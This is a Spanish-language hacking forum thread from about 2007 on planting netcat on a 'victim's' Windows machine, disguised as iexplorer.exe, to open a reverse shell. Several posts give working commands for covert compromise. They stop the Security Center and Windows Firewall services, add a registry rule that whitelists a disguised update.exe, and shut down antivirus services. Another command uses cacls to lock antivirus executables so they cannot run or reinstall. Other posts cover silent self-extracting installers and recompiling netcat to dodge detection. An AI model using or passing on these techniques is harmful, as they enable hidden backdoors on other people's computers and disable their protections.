 Autor
|
Tema: Jugando con netcat (Leído 377,601 veces)
|
|
|
Asingato
 Desconectado
Mensajes: 4
|
Muchas gracias por tu ayuda. Ahora me surge otra duda. El archivo que yo tengo que mandarle a la victima, es la carnada? o el archivo que renombramos iexplorer.exe?
El iexplorer, es el que antiguamente era en nc.exe, es abosulatemente necesario que este archivo este en la carpeta de system32? o se puede tener en otra carpeta?
Yo me baje el netcat de otra pagina, ya que no encontr el link en la tuya, y al bajarmelo, venis con el nc, que fue el que renmbramos, porfavor corrigeme si estoy mal.
LA ultima cosa es que cuadno ejecuto cmd, no me aparece lo mismo que veo en su pantalla, ya que a ud le sale de una en la carpeta de windows. a mi me aparecen :
C:/documentsandsettings/estudio> (bueno con los backslash de manera adecuada)
Supungo debo estar en la carpeta de windows para hacer esta programacion. ¿Como llego a esta carpeta?
De antemano gracias
|
|
|
|
« Última modificación: 26 Mayo 2007, 17:32 pm por Asingato »
|
En línea
|
|
|
|
nica
Desconectado
Mensajes: 46
|
no hay problemas con lo que te aparezca a vos a la hora de abrir la consola, lo unico que para poder correr el nc, recuerda que tiene que estar en la carpeta del system32 que es el path del sistema para que este comando pueda ser llamado desde cualquier locacion. es cuestion de criterio de cada kien y de gusto de cada kien, lo puedes poner en la system32 o en una carpeta llamada "jodedera" es a como tu kieras, solo recuerda que si lo pones en una carpeta diferente a la del system32, tienes que entrar a esa carpeta y ejecutar los comandos...
|
|
|
|
|
En línea
|
|
|
|
D4RIO
Desconectado
Mensajes: 1.004
U N I X
|
Hola, se me dio por hacerme una cuenta aca para saldar una cuenta con este querido NetCat. Resulta que he intentado frustradamente y varias veces descargar el programilla y cada vez que descomprimo el contenido del archivo me desaparece el nc.exe que es en fin lo que me interesa. Me veo limitado a usar los aburridos paquetes de siempre, con NirCmd, Shutdown y un par mas (los agrego a un paquete autoextraible si los deseo utilizar, y como tip uso un batch que tome informacion de la variable PATH para instalar el programa, el mismo se autoejecuta al descomprimir). Y sobre eso, nica, system32 no es el unico path del sistema y de hecho si lo deseamos podemos poner a esa tal carpeta "jodedera" (lindo nombre, jeje) dentro de la variable path haciendo innecesario el tener que ejecutar los comandos desde dentro de ella. Eso podemos hacerlo mediante el viejo comando set, expandiendo PATH mediante %PATH:str1=str2%Podemos hacer que esto sea parte de un Batch y tome las expansiones de la variable de algun archivo de texto (producto de otro Batch corrido en una auto-descompresion) mediante for /F "tokens=*" %%i in (nomredelarchivo.txt) bla bla bla... Asi y abusando de %systemdrive%, por ejemplo, podemos hacer que nuestro programa se instale con éxito en cualquier máquina que use windows...jejeje  |
|
|
|
|
En línea
|
|
|
|
|
WHK
|
cada vez que descomprimo el contenido del archivo me desaparece el nc.exe que es en fin lo que me interesa Lo mas probable es que tu antivirus te lo esté eliminando por lo cual deverás desactivarlo mientras lo usas o agregarlo a la lista de archivos omitidos por el mismo. Me veo limitado a usar los aburridos paquetes de siempre, con NirCmd Yo antes de conocer el netcat usaba mucho el nircmd es una buenisima herramienta, pero lo malo es que casi todos los antivirus lo detectan y no te proporciona tanta flexibilidad como el netcat (en algunos casos incluia el nircmd junto con el netcat con un winrar SFX de esa forma manejaba mas rápido las funciones de la appi en windows pero a estas alturas ya no lo necesito mucho  ). Eso podemos hacerlo mediante el viejo comando set Yo p`refiero que la gente coloque el netcat dentro de carpetas donde todos puedan obtener acceso como %tmp% o %homepath% ya que en algunos casos la carpeta del sistema está restringida por no tener derechos de admin  ademas las variables no se guardarán si creas los comandos desde el mismo autoejecutable (tendrías que crear un BAT y no creo que al usuario le guste ver una ventanita DOS y esperar a que todo se ejecute antes de cerrarla). Como te digo... solo desactiva un poco tu antivirus y despues descargalo 
|
|
|
|
|
En línea
|
|
|
|
D4RIO
Desconectado
Mensajes: 1.004
U N I X
|
ademas las variables no se guardarán si creas los comandos desde el mismo autoejecutable (tendrías que crear un BAT y no creo que al usuario le guste ver una ventanita DOS y esperar a que todo se ejecute antes de cerrarla). Es verdad, pequeño detalle, jeje...Respecto al NirCmd es buena, y permite bastante, pero tiene muchos limites que no me gustan, y muchas de las cosas que ofrece son nuevas formas de escribir cosas que el mismo cmd ya traia, como el caso de las variables de sistema, o el trabajo sobre el registro. Sin embargo es cierto que tiene lo suyo (movecursor, multiremote...)...Y a mi tambien me gusta mandar SFX con varias cosas Y por lo del netcat ya configure el antivirus para que no haga nada con esa clase de archivos "sospechosos", asique ya puedo usar netcat sin problemas. Gracias igual... Ahora, una duda. Si quiero enviar netcat a alguien para generar una conexion inversa como puedo hacer para que su antivirus no me lo detecte (a demas de desactivar el firewall de windows y el centro de seguridad que es cosa de dos renglones)
|
|
|
|
|
En línea
|
|
|
|
|
WHK
|
como puedo hacer para que su antivirus no me lo detecte (a demas de desactivar el firewall de windows y el centro de seguridad que es cosa de dos renglones) Para el servicio de Centro de seguridad: net stop "Centro de seguridad" Para el servicio del Firewall de Windows: net stop "Firewall de Windows/Conexión compartida a Internet (ICS)"Burlar Firewall: reg add HKLM\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\ /v "%homedrive%%homepath%\update\update.exe" /t reg_sz /d "%homedrive%%homepath%\update\update.exe:*:Enabled:update" /fBurlar Antivirus: Ayer con una persona detubimos facilmente el servicio de karpesky (ya no recuerdo el nombre) con net stop. Primero ejecutas net start y buscas los dos servicios relacionados con este antivirus y despues ejecutas net stop "servicio" despues vas a la carpeta del antivirus y ejecutas cacls *.exe /E /C /P %username%:n&&cacls *.exe /E /C /P SYSTEM:n Para que el antivirus no pueda volver a ejecutarse, desintalarse ni reinstalarse nuevamente(Solo funciona con derechos de admin).
|
|
|
|
|
En línea
|
|
|
|
D4RIO
Desconectado
Mensajes: 1.004
U N I X
|
Creo que sobre el firewall no me di a entender, es decir, esa es la parte facil ya que el firewall de windows es facil de burlar y/o desactivar. A propósito sobre ésto a veces aparece como "Windows Firewall/Internet Connection Sharing (ICS)", aunque cabe probar simplemente net stop SharedAccess, supongo que sabras eso pero puede serle util a otro que lo lea.
Respecto al antivirus he intentado con net stop "Active Virus Shield" que es el nombre con el que aparece el servicio del mismo, pero lo que obtengo es un error ya que la detencion o interrupcion no es valida para ese servicio, es decir que ese servicio no acepta el comando net stop
Bien, lei que el LD-Pinch (conocido troyano) logra con exito detener los procesos de algunos antivirus, como pavsrv51 (panda antivirus), supongo que se podrá con taskkill, o con NirCmd killprocess, pero no creo que me sirva para mucho. El tema es lograr que una maquina ajena no reconozca que le meti netcat...pero es todo un trabajito de investigacion, jaja
|
|
|
|
|
En línea
|
|
|
|
D4RIO
Desconectado
Mensajes: 1.004
U N I X
|
Bueno, jaja! supongo que eso sera para WHK... yo tambien tenia un vago proyecto de hacer un SO mas lindo...ahora estaba viendo que por aca hay otro grupo asi que se llama grupo solar...no se si estan trabajando en un SO, lo que se es que trabajan con software libre...igual por ahora hay que esperar un poquito y prepararse para los nuevos microprocesadores Intel y AMD (competencia pura... XD) y el nuevo monitor de Microsoft...porque si no vas con esa tecnologia le das el lugar a microsoft de tomar el mercado.
|
|
|
|
|
En línea
|
|
|
|
|
WHK
|
supongo que se podrá con taskkill, o con NirCmd killprocess No puedes detener un proceso directamente de esa forma... con karpesky si funcionó detener el servicio... conozco a alguien por ahi que sabe detener el Nod32 pero es un proyecto suyo llamado NOD32 2.70 Fucker , pero lamentablemente no es mio pero sería bueno si pudiera compartirlo ... de todas maneras una solución era modificar o recompilar el netcat de tal forma que ya no sea detectado, pero creo que lo tenía olvidado .
|
|
|
|
|
En línea
|
|
|
|
|
 |
recuerda que Debes usar tu ip en ves de la mia o 127.0.0.1
- 
